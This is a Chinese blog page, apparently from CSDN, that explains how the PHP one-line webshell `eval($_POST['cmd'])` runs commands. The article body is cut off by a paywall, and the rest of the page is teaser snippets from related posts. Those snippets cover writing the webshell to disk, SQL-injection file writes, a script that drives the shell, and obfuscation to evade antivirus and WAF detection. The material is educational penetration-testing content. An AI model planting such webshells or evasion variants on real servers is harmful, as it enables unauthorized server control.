一句话木马（webshell）是如何执行命令的

最新推荐文章于 2024-08-12 21:39:45 发布

weixin_33762130

最新推荐文章于 2024-08-12 21:39:45 发布

阅读量1w

点赞数 4

文章标签： php shell java

原文链接：https://yq.aliyun.com/articles/480122

版权

本文深入分析了一句话PHP木马的工作原理，解释了如何通过POST提交的`cmd`或`pw`变量执行命令。eval()函数在其中起到关键作用，将接收到的字符串作为PHP代码执行。在适当条件下，可以利用这种木马执行系统命令，获取或操作服务器资源。文章还提及了使用菜刀等Webshell管理工具的情况。

摘要由CSDN通过智能技术生成

在很多的渗透过程中，渗透人员会上传一句话木马（简称webshell）到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话木马到底是如何执行的呢，下面我们就对webshell进行一个简单的分析。

首先我们先看一个原始而又简单的php一句话木马。

<?php @eval($_POST['cmd']); ?>

看到这里不得不赞美前辈的智慧。

对于一个稍微懂一些php的人而言，或者初级的安全爱好者，或者脚本小子而言，看到的第一眼就是密码是cmd，通过post提交数据，但是具体如何执行的，却不得而知，下面我们分析一句话是如何执行的。

这句话什么意思呢？

php的代码要写在<?php ?>里面，服务器才能认出来这是php代码，然后才去解析。

@符号的意思是不报错。

例如：

 
         <?php

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_33762130

关注关注

4
点赞
踩
11

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

php一句话木马调用cmd命令,一句话木马（webshell）是如何执行命令的

weixin_31748605的博客

03-09

2941

在很多的渗透过程中，渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话木马到底是如何执行的呢，下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话木马。看到这里不得不赞美前辈的智慧。对于一个稍微懂一些php的人而言，或者初级的安全爱好者，或者脚本小子而言，看到的第一...

webshell与一句话木马

2ed

06-23

3141

webshell 可理解为web+shell 通常就是大佬所说的大马 web就是指web页面，shell就是命令执行环境。webshell就是以 asp、aspx、php、jsp 或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp、aspx、php或jsp后门文件与网站web服务器目录下正常的网页文件混在一起，然后就可以使用浏览器来...

参与评论您还未登录，请先登录后发表或查看评论

一句话***（webshell）是如何执行命令的

weixin_34381687的博客

06-16

1921

在很多的***过程中，***人员会上传一句话***（简称webshell）到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话***到底是如何执行的呢，下面我们就对webshell进行一个简单的分析。首先我们先看一个原始而又简单的php一句话***。<?php @eval($_POST['cmd']); ?>看到这里不得不赞美前...

一句话木马是如何被执行的？

weixin_40950781的博客

08-18

2989

一句话木马是如何被执行的0x01 什么是一句话0x02 最最典型的一句话小马0x03 大马与小马0x04 一句话小马是如何执行的呢 0x01 什么是一句话 一句话木马就是只需要一行代码的木马，短短一行代码，就能做到和大马相当的功能。为了绕过waf的检测，一句话木马出现了无数种变形，但本质是不变的：木马的函数执行了我们发送的命令。 0x02 最最典型的一句话小马 asp一句话：<%eval r...

无字母数字webshell之命令执行

最新发布

qq_51502737的博客

08-12

813

因为不能使用了，所以我们无法构造PHP中的变量。所以，如何解决这个问题？

PHP执行命令一句话

cnbird's blog

01-06

3186

PHP执行命令一句话

一句话在PHP主机上执行命令

墨鱼菜鸡

11-06

166

php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理

weixin_39800387的博客

02-19

2454

讲一下SQL注入中写一句话拿webshell的原理，主要使用的是 SELECT ... INTO OUTFILE 这个语句，下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下，我们的目的是在目...

php简短一句话木马免杀,免杀/一句话木马(PHP)

weixin_39598568的博客

03-13

2493

前言在打CTF或渗透时，经常会遇到waf，普通的一句话木马便会被检测出来，打CTF还好，如果是渗透测试那么就有可能直接封IP，而且会发出报警信息。所以要掌握一句话木马的免杀。Webshell检测方式网上有很多免杀的一句话木马，但是如果不知道主流杀毒或waf的检测方式，也只是类似爆破而已，运气好了能进去，运气不好就换下一个payload。因此在此之前，先来了解一下都有哪些检测方式。日志检测使用Web...

webshell详解

w17791476027的博客

08-03

5173

概念webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称做为一种网页后门。黑客在入侵了一个网站后，通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起，然后就可以使用浏览器来访问asp或者php后门文件，得到一个命令执行环境，以达到控制网站服务器的目的。从字面上来说，webshell单词可以拆成web和shell。其中web即服务器所开放的web服务。Shell即命令执行环境，用户与服务器操作系统交互的接口。

自动利用webshell执行系统命令py脚本

1stPeak's Blog

03-06

747

python2脚本 # -*- coding: utf-8 -*- import urllib.request import threading def cat_flag(): cmd = "cat%20/flag.txt" # 还可用cut -c1- /flag.txt path = "shell.php" passwd = "peak" for i in r...

一句话木马

Anton__1的博客

05-05

397

#一句话木马 传统防护检测的的免杀方法：一、隐藏关键字绕过php代码标志<?的限制： <script language="php">@eval($_POST['x'])</script> 拆分拼接： <?php $arr=explode(",","a,s,d,f,s,d,e,k,r,t"); //把字符串打散为数组 $payload=$arr[0].$arr[1].$arr[4].$arr[6].$arr[8].$arr[9];//拼接成assert //php版本

命令执行--系统命令

bylfsj的博客

09-26

985

一、利用漏洞获取webshell 漏洞上传，形成一句话木马，利用命令执行获得webshell fputs(fopen("a.php","w"),'<?php eval($_POST["cmd"])?>'); 以防过滤，可以利用ASCII转换，连接执行。 1.要点：要清楚单双引号的区别。单引号，引号内部的变量不会执行，直接输出。双引号，会经过编译器解释后执行。问：你看出来什么...

webshell免杀之函数与变量玩法

二狗的博客

02-16

425

从上述案例能看出来，想要免杀很简单，不需要花里胡哨的操作，只需要改变下结构或函数，不需要变形编码关键字也能实现免杀?查杀结果[外链图片转存中…(img-X5Fmg7Yz-1676528059990)]脚本正常连接[外链图片转存中…(img-KDLqFrLK-1676528059990)]从上述案例能看出来，想要免杀很简单，不需要花里胡哨的操作，只需要改变下结构或函数，不需要变形编码关键字也能实现免杀。

WebShell命令执行限制（解决方案）

realmels的博客

09-20

2594

本专栏是笔者的网络安全学习笔记，一面分享，同时作为笔记前文链接 WAMP/DVWA/sqli-labs 搭建 burpsuite工具抓包及Intruder暴力破解的使用目录扫描，请求重发，漏洞扫描等工具的使用网站信息收集及nmap的下载使用 SQL注入(1)——了解成因和手工注入方法 SQL注入(2)——各种注入 SQL注入(3)——SQLMAP SQL注入(4)——实战SQL注入拿webshell Vulnhub靶机渗透之Me and My Girlfriend XSS漏洞文件上传漏洞文件.

Web页面执行shell命令

qq_43649264的博客

10-22

5882

本文以apache为web服务器为例安装apache服务 yum -y install httpd 启动apache $ sudo systemctl restart httpd 创建shell脚本 $ cd /var/www/cgi-bin/ $ vim shell #!/bin/sh alias urldecode='sed "s@+@ @g;s@%@\\\\x@g" | xargs -0 printf "%b"' echo -e "Content-type: text/pl

Web安全-一句话木马

mmxhappy的专栏

02-04

1636

在很多的渗透过程中，渗透人员会上传一句话木马（简称Webshell）到目前web服务目录继而提权获取系统权限，不论asp、php、jsp、aspx都是如此，那么一句话木马到底是什么呢?先来看看最简单的一句话木马：?【基本原理】利用文件上传漏洞，往目标网站中上传一句话木马，然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误，也不报错。eval（）函数表示括号内的语句字符串什么的全都当做代码执行。

攻防世界web入门-webshell write up

m0_62851980的博客

03-29

505

题目描述：小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。这题重点在于对木马格式的了解和蚁剑的使用打开网页页面只有一句话：你会使用webshell吗？ <?php @eval($_POST['shell']);?> 先来稍微了解一下木马：在php语言中，最简单的一句话木马语言为： <?php @eval($_POST['attack']);?> 这句话中eval（）函数表示括号内的语句字符串什么的全都当做代码执行，@表示后面..